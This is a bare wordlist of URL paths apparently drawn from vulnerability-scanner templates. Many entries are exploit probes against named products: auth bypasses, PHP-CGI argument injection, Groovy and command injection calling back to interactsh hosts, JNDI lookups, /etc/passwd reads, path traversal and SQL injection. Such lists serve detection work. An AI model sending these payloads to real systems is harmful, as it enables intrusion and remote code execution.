/remote/login
/login
/api/v3/user/orgs
/api/v3/orgs/{{org_name}}/memberships/{{username}}
/api/v3/orgs/{{org_name}}/repos
/session
/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck
/
/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml

/filex/read-raw?url=http://oast.me&cut=1
/access/set?param=enableapi&value=1
/SetupWizard.aspx/{{string}}
/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}
/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}
/service.pdfs/confluence?lang=en&file=`curl+{{interactsh-url}}`
/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true
/app/rest/server
/system/config_menu.htm
/api/v1/info
/hax?jsp=/app/rest/server;.jsp
/?p=3232&wp_automatic=download&link=file:///etc/passwd
/helpdesk/WebObjects/Helpdesk.woa
/streampipes-backend/api/v2/auth/settings
/streampipes-backend/api/openapi.json
/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1
/js/..%2f%2f/wizard.htm
/images/..%2f%2f/wizard.htm
/login.rst
/xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}
/api/v1/devices
/geoserver/wfs?service=WFS&request=GetCapabilities
/geoserver/ows?service=WFS&request=GetCapabilities
/wfs?service=WFS&request=GetCapabilities
/ows?service=WFS&request=GetCapabilities
/geoserver/wfs?service=WFS
/geoserver/ows?service=WFS
/wfs?service=WFS
/ows?service=WFS
/tmp/temp.db%3f.1.1.1.1a-1.css
/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css
/api/v1/serverinfo
/RSTS/UserLogin/LoginController?response_type=token&redirect_uri=https%3A%2F%2Flocalhost&loginRequestStep=6&csrfTokenTextbox=aaa
/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
/rest/users/1/settings/
/assets/../package.json
/wp-content/plugins/easy-digital-downloads/readme.txt
?view[path]={{pfield}}&view[match][$where]=global.process.mainModule.constructor._load(
/wp-json/h5vp/v1/video/0?id=
/login?redir=/ng
/OS/startup/restore/restoreAdmin.php
/web_cste/cgi-bin/product.ini
/cgi-bin/db_eventlog_w.cgi?date_start=0&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271
/client/index.php%3F.php/gsb/users.php
/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e
/{{route}}
